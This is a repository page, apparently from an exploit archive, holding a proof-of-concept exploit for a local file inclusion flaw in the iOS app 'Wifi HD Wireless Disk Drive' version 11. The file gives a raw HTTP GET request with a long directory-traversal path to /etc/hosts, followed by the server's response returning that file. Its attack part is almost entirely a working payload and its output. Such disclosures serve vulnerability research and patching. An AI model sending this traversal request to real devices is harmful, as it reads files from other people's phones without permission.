3d2fa2f00a
2 changes to exploits/shellcodes Wifi HD Wireless Disk Drive 11 - Local File Inclusion WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)
39 lines
No EOL
1.1 KiB
Text
39 lines
No EOL
1.1 KiB
Text
# Exploit Title: Wifi HD Wireless Disk Drive 11 - Local File Inclusion
|
|
# Date: Aug 13, 2022
|
|
# Exploit Author: Chokri Hammedi
|
|
# Vendor Homepage: http://www.savysoda.com
|
|
# Software Link: https://apps.apple.com/us/app/wifi-hd-wireless-disk-drive/id311170976
|
|
# Version: 11
|
|
# Tested on: iPhone OS 15_5
|
|
|
|
# Proof of Concept
|
|
GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
|
|
Host: 192.168.1.100
|
|
Connection: close
|
|
Upgrade-Insecure-Requests: 1
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X)
|
|
AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/604.1
|
|
Referer: http://192.168.1.103/
|
|
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
|
|
Accept-Encoding: gzip, deflate
|
|
|
|
|
|
-----------------
|
|
|
|
HTTP/1.1 200 OK
|
|
Content-Disposition: attachment
|
|
Content-Type: application/download
|
|
Content-Length: 213
|
|
Accept-Ranges: bytes
|
|
Date: Sat, 13 Aug 2022 03:33:30 GMT
|
|
|
|
##
|
|
# Host Database
|
|
#
|
|
# localhost is used to configure the loopback interface
|
|
# when the system is booting. Do not change this entry.
|
|
##
|
|
127.0.0.1 localhost
|
|
255.255.255.255 broadcasthost
|
|
::1 localhost |